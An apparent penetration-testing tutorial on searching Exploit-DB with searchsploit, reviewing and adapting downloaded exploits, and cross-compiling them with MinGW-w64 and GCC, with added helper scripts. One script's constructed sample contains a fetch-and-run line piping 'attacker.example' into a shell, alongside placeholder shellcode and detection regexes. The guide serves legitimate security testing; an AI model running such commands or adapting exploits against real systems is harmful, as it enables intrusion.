# Searching For Exploits

## Searching For Publicly Available Exploits

After identifying a potential vulnerability in a target, or in a service running on it, the next step is to search for exploit code for that vulnerability and to confirm that the code actually matches the version and configuration you found.

* **Exploit Code:** Exploit code for most public vulnerabilities is easy to find online. Downloading it and running it blindly against a target is risky on two counts: the code may be hostile toward the person running it (backdoored payloads, callbacks to a third-party host, destructive side effects), and it may have been written for a different version, build or configuration than the one you found, crashing the service instead of exploiting it. Read the code in full, understand every hardcoded value, and test it in a lab before pointing it at a client system.
* **Legitimate Exploit Databases:** There are a handful of legitimate and vetted exploit databases that you should use when searching for exploits online:
  * [**Exploit-db**](https://www.exploit-db.com/)
  * [**Rapid7**](https://www.rapid7.com/db/)
  * [**Packet Storm**](https://packetstormsecurity.com/files/tags/exploit/) **(Cyber News + Exploits + More)**

## Searching For Exploits With SearchSploit

* **Offline Exploits:** On an engagement the testing host may have no internet access, or you may not want your searches to leave the network, so you need a local copy of the exploit archive.
* **Exploit-db Database:** Kali Linux ships the Exploit-DB archive as the `exploitdb` package, giving you every published exploit locally.
* **SearchSploit Tool:** `searchsploit` is the command-line front end that queries that offline copy.
* **Storage Location:** The archive lives in `/usr/share/exploitdb`: the exploit sources under `exploits/`, grouped by platform and type, with the searchable index in `files_exploits.csv`.
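The usual workflow with the real tool is `searchsploit <keywords>` (add `-t` to match titles only, `-e` for an exact phrase, `-w` to print the exploit-db.com URLs), `searchsploit -x <path>` to read an entry, `searchsploit -m <EDB-ID>` to copy it into the current directory, `searchsploit --nmap scan.xml` to search from an Nmap XML scan, and `searchsploit -u` to update the archive. The script below is an added example, not part of these notes or of the `exploitdb` package: it reproduces the core of what `searchsploit` does, a case-insensitive keyword search over the index CSV with an optional platform filter. It assumes the index layout `id,file,description,...` with paths of the form `exploits/<platform>/<type>/<id>.<ext>`, reads the real index if it exists, and otherwise falls back to a constructed three-row sample whose entries are not real Exploit-DB records.

```shell
#!/bin/sh
# Added example (not from the original notes): an offline keyword search over
# an Exploit-DB style index, i.e. what `searchsploit` does under the hood.
# On Kali the real index is /usr/share/exploitdb/files_exploits.csv. The rows
# in SAMPLE_INDEX are CONSTRUCTED for illustration and are not real entries.
# Descriptions in the real CSV are quoted and may contain commas, which shifts
# the later columns; this script therefore takes platform/type from the path
# column, which always precedes the description.
EDB_INDEX="${EDB_INDEX:-/usr/share/exploitdb/files_exploits.csv}"

SAMPLE_INDEX='id,file,description,date_published,author,type,platform,port
10001,exploits/linux/remote/10001.c,"ExampleFTP 1.2 - Remote Buffer Overflow",2020-01-01,anon,remote,linux,21
10002,exploits/windows/local/10002.py,"ExampleFTP 1.2 - Local Privilege Escalation",2020-02-01,anon,local,windows,0
10003,exploits/windows/remote/10003.rb,"OtherDaemon 3.0 - Remote Code Execution",2021-03-01,anon,remote,windows,8080'

# load_index: the real index when readable, otherwise the constructed sample.
load_index() {
    if [ -n "$EDB_INDEX" ] && [ -r "$EDB_INDEX" ]; then
        cat "$EDB_INDEX"
    else
        printf '%s\n' "$SAMPLE_INDEX"
    fi
}

# search_index TERM [PLATFORM]
# Case-insensitive substring match on the whole index line (title and path),
# optionally limited to one platform directory (linux, windows, ...).
# Prints "EDB-ID | platform/type | description | path" per hit.
search_index() {
    term="$1"
    platform="${2:-}"
    load_index | awk -F',' -v term="$term" -v plat="$platform" '
        BEGIN { term = tolower(term); plat = tolower(plat) }
        NR == 1 { next }                                   # header row
        {
            if (index(tolower($0), term) == 0) next
            if (plat != "" && index($2, "exploits/" plat "/") == 0) next
            split($2, p, "/")                              # exploits/<platform>/<type>/<file>
            desc = $3; gsub(/"/, "", desc)                 # strip CSV quoting
            printf "%s | %s/%s | %s | %s\n", $1, p[2], p[3], desc, $2
        }'
}

# Stand-alone demo: everything mentioning ExampleFTP, then only the Linux hits.
search_index "ExampleFTP"
search_index "ExampleFTP" linux
```

Once you have an EDB-ID from the listing, `searchsploit -m <id>` copies that file into the working directory so you can read and edit it without touching the archive.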

## Fixing Exploits

Before executing any exploit, whether it came from a public database or from your own archive, review the code and its accompanying notes in full. You need to know exactly what it does, what it requires (target version and build, architecture, credentials, a listener on your side) and what it leaves behind on the target. Typical edits before an exploit is usable: replace the hardcoded target host and port, regenerate the embedded shellcode for your own listener and the target's bad characters, adjust return addresses or offsets that were found for one specific build, and fix anything written for an older interpreter or library version.

Always ensure a thorough grasp of the exploit's operation and potential implications prior to proceeding; a memory-corruption exploit with the wrong offsets crashes the service rather than exploiting it. Unauthorized or careless use of exploits can have significant consequences.
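The following script is an added example, not part of these notes: a pre-flight triage of a downloaded exploit source that lists the hardcoded values you will normally have to change (target host, return address, shellcode) and the things that should not be there at all (callbacks to third-party hosts, opaque encoded blobs, commands that execute on the attacker's own machine). The regexes are heuristics that shortlist lines for manual review; they do not replace reading the code. The `SAMPLE_EXPLOIT` text it audits is constructed for this example and is deliberately non-functional.

```shell
#!/bin/sh
# Added example (not from the original notes): a pre-flight audit of a
# downloaded exploit source. Each category is something a reviewer must look
# at before running the code. SAMPLE_EXPLOIT is a CONSTRUCTED, non-working
# snippet written for this example; the IP, address, shellcode bytes, URL and
# base64 string in it are placeholders.

SAMPLE_EXPLOIT='/* ExampleFTP 1.2 remote overflow - constructed sample, does nothing useful */
#define TARGET "192.168.56.101"
#define PORT 21
#define RET 0x7c9d30d7
unsigned char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68";
char *stage2 = "aGVsbG8gd29ybGQgdGhpcyBpcyBqdXN0IHNhbXBsZSB0ZXh0Cg==";
int main(void) { system("curl -s http://attacker.example/stage | sh"); return 0; }'

# audit_exploit FILE: print one "CATEGORY: line:match" per finding.
audit_exploit() {
    f="$1"
    # hardcoded target, or a callback host that is not yours
    grep -nEo '([0-9]{1,3}\.){3}[0-9]{1,3}' "$f"       | sed 's/^/IPV4: /'
    # where does it phone home or fetch a second stage from?
    grep -nEo 'https?://[^"[:space:]]+' "$f"           | sed 's/^/URL: /'
    # embedded shellcode: regenerate it yourself (e.g. with msfvenom), do not trust it
    grep -nEo '(\\x[0-9a-fA-F]{2}){4,}' "$f"           | sed 's/^/SHELLCODE: /'
    # return/jump address that was valid for ONE specific build of the target
    grep -nEo '0x[0-9a-fA-F]{8}' "$f"                  | sed 's/^/ADDRESS: /'
    # opaque encoded blob: decode and inspect before running anything
    grep -nEo '[A-Za-z0-9+/]{40,}={0,2}' "$f"          | sed 's/^/BASE64: /'
    # commands executed on the machine that RUNS the exploit, i.e. yours
    grep -nEo '(system|popen|exec[lv]p?e?|os\.system|subprocess\.[a-z_]+)\(' "$f" | sed 's/^/LOCAL_EXEC: /'
    return 0
}

# count_findings FILE CATEGORY: number of findings of one category.
count_findings() {
    audit_exploit "$1" | grep -c "^$2:" || true
}

# Stand-alone demo on the constructed sample.
SAMPLE_FILE="${TMPDIR:-/tmp}/exploit_audit_sample_$$.c"
printf '%s\n' "$SAMPLE_EXPLOIT" > "$SAMPLE_FILE"
trap 'rm -f "$SAMPLE_FILE"' EXIT
audit_exploit "$SAMPLE_FILE"
```

Run it as `audit_exploit /path/to/exploit.c` on the file you mirrored. An empty `LOCAL_EXEC`, `URL` and `BASE64` section is what you want to see; every `IPV4`, `ADDRESS` and `SHELLCODE` hit is a line you will probably edit.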

## Cross-Compiling Exploits

* **Executable Code Development:** Exploit code is often written in C or C++ and must be compiled into a native binary for the target: a Portable Executable (PE) for Windows or an ELF binary for Linux/Unix. C# exploits are compiled with the .NET compiler (`csc` on Windows, `mcs` from Mono on Linux) into a managed PE and are not built with GCC.
* **Cross-Compilation Definition:** Cross-compiling is compiling code for one platform (for example a Windows target) on a different platform (your Linux attack host).
* **Penetration Testing Skills:** A penetration tester needs to be able to compile exploit code written in C and C++ for both Windows and Linux targets, 32-bit and 64-bit, and to read the resulting compiler and linker errors.

## Compiling Exploit Code Using MinGW-w64 and GCC

1. **64-bit Windows (PE) compilation:**

   ```bash
   x86_64-w64-mingw32-gcc <exploit_code> -o <output_name>
   ```
2. **32-bit Windows (PE) compilation (with the Winsock library):**

   ```bash
   i686-w64-mingw32-gcc <exploit_code> -o <output_name> -lws2_32
   ```
3. **Compiling an ELF binary (for Linux/Unix):**

   ```bash
   gcc -pthread <exploit_code> -o <output_name> -lcrypt
   ```

The `i686-w64-mingw32-` prefix selects the 32-bit MinGW-w64 cross-compiler and `x86_64-w64-mingw32-` the 64-bit one; match this to the target process, not to your own machine. `-lws2_32` is needed whenever the source uses Winsock (`WSAStartup`, `socket`, `connect`), whatever the bitness, and must come after the source file. For a 32-bit Linux target on a 64-bit Kali host add `-m32` (requires `gcc-multilib`); `-static` avoids libc version mismatches on the target. Confirm the result with `file <output_name>` before transferring it.
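The three commands above are one decision, target OS and bitness, plus the libraries that decision implies. The script below is an added example, not from these notes or from any toolchain, that encodes that decision so you cannot pick the wrong prefix by accident, links the libraries after the source file, and verifies the output with `file`. It assumes the `mingw-w64` and `gcc-multilib` packages as shipped on Kali, reports (instead of failing) when a toolchain is not installed, and builds a constructed C source that only reports what it was compiled for.

```shell
#!/bin/sh
# Added example (not from the original notes): choose the compiler for the
# TARGET platform and bitness, link the right libraries, verify the output.
# Assumes the mingw-w64 and gcc-multilib packages as on Kali. The C source
# written below is CONSTRUCTED and only prints which platform it was built for.

# cross_cc OS ARCH -> compiler (plus bitness flags) for OS in windows|linux, ARCH in 32|64.
cross_cc() {
    case "$1/$2" in
        windows/32) printf '%s\n' "i686-w64-mingw32-gcc" ;;      # 32-bit PE
        windows/64) printf '%s\n' "x86_64-w64-mingw32-gcc" ;;    # 64-bit PE (not i686-)
        linux/32)   printf '%s\n' "gcc -m32 -pthread" ;;         # 32-bit ELF, needs gcc-multilib
        linux/64)   printf '%s\n' "gcc -pthread" ;;              # 64-bit ELF
        *) echo "unsupported target: $1/$2" >&2; return 1 ;;
    esac
}

# cross_libs OS [winsock] -> libraries that must come AFTER the source file.
cross_libs() {
    case "$1" in
        windows) if [ "${2:-}" = "winsock" ]; then printf '%s\n' "-lws2_32"; else printf '\n'; fi ;;
        linux)   printf '%s\n' "-lcrypt" ;;
    esac
}

# build_exploit OS ARCH SRC OUT [winsock]: compile, then show what was produced.
build_exploit() {
    os="$1"; arch="$2"; src="$3"; out="$4"; opt="${5:-}"
    cc=$(cross_cc "$os" "$arch") || return 1
    libs=$(cross_libs "$os" "$opt")
    tool=${cc%% *}                              # first word is the compiler binary
    if ! command -v "$tool" >/dev/null 2>&1; then
        echo "toolchain '$tool' not installed; would run: $cc $src -o $out $libs" >&2
        return 2
    fi
    $cc "$src" -o "$out" $libs || return 1      # $cc/$libs unquoted on purpose: they carry flags
    if command -v file >/dev/null 2>&1; then file "$out"; else echo "built $out"; fi
}

# Stand-alone demo: build the constructed sample for the host (64-bit ELF) if gcc is present.
SRC="${TMPDIR:-/tmp}/xcompile_sample_$$.c"
cat > "$SRC" <<'EOF'
#include <stdio.h>
int main(void) {
#ifdef _WIN32
    puts("built for Windows");
#else
    puts("built for Linux");
#endif
    return 0;
}
EOF
build_exploit linux 64 "$SRC" "${SRC%.c}" || echo "demo build skipped"
rm -f "$SRC" "${SRC%.c}"
```

`build_exploit windows 32 exploit.c exploit.exe winsock` reproduces step 2 above and `build_exploit windows 64 exploit.c exploit.exe` step 1; the `file` line at the end is the check that the binary is really a PE32 or PE32+ (or ELF 32/64-bit) of the bitness the target process runs at.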

You can also find pre-compiled exploit binaries in the [Exploit Database GitLab repository](https://gitlab.com/exploit-database/exploitdb-bin-sploits); treat them with the same suspicion as source you have not read, and verify them with `file` and a sandboxed run before use.

***


**Hacker's Mantra:** "I look like a geek hacker, but I don’t know anything about computers." - Justin Long
